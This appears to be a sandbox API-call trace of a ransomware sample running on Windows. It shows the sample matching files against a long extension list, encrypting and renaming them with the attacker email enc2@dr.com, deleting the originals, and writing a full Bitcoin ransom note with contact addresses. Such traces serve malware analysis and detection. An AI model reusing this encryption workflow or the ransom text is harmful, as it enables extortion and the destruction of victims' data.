	[0175.353] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.353] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0175.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.354] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0175.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0175.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0175.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0175.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0175.368] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="..", cAlternateFileName="")) returned 1
	[0175.368] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0175.368] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18a8d11, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18a8d11, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0175.368] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0175.368] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0175.368] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\"
	[0175.369] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml"
	[0175.369] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml") returned 97
	[0175.369] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.369] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml") returned 0x61
	[0175.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.370] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.370] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml"
	[0175.370] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml") returned 97
	[0175.370] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.371] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.371] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.372] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.372] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.372] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.373] ReadFile (in: hFile=0x39c, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x15c, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x189930*=0x15c, lpOverlapped=0x0) returned 1
	[0175.377] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.377] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb440) returned 1
	[0175.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.380] CryptCreateHash (in: hProv=0xfcb440, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0175.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.380] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.380] CryptDeriveKey (in: hProv=0xfcb440, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb95b0) returned 1
	[0175.381] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.381] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x15c, dwBufLen=0x15c | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x160) returned 1
	[0175.381] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.381] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x15c | out: Destination=0xfdc770) 
	[0175.381] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.381] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x15c, dwBufLen=0x160 | out: pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x160) returned 1
	[0175.382] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.382] CryptDestroyKey (hKey=0xfb95b0) returned 1
	[0175.382] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.383] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0175.383] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.383] CryptReleaseContext (hProv=0xfcb440, dwFlags=0x0) returned 1
	[0175.383] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.383] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.384] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0175.386] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0175.386] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0175.387] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x189938*=0x160, lpOverlapped=0x0) returned 1
	[0175.390] CloseHandle (hObject=0x3a0) returned 1
	[0175.390] CloseHandle (hObject=0x39c) returned 1
	[0175.391] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml")) returned 1
	[0175.394] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml")) returned 0
	[0175.394] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18a8d11, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18a8d11, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18a8d11, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0175.394] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0175.395] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0175.395] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov"
	[0175.395] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*"
	[0175.395] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.395] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.396] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0175.396] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.396] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0175.396] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0175.399] CloseHandle (hObject=0x390) returned 1
	[0175.399] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.400] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0175.403] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0175.403] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.403] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0175.404] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0175.404] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0175.404] CloseHandle (hObject=0x390) returned 1
	[0175.404] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.405] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.405] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0175.405] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0175.405] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
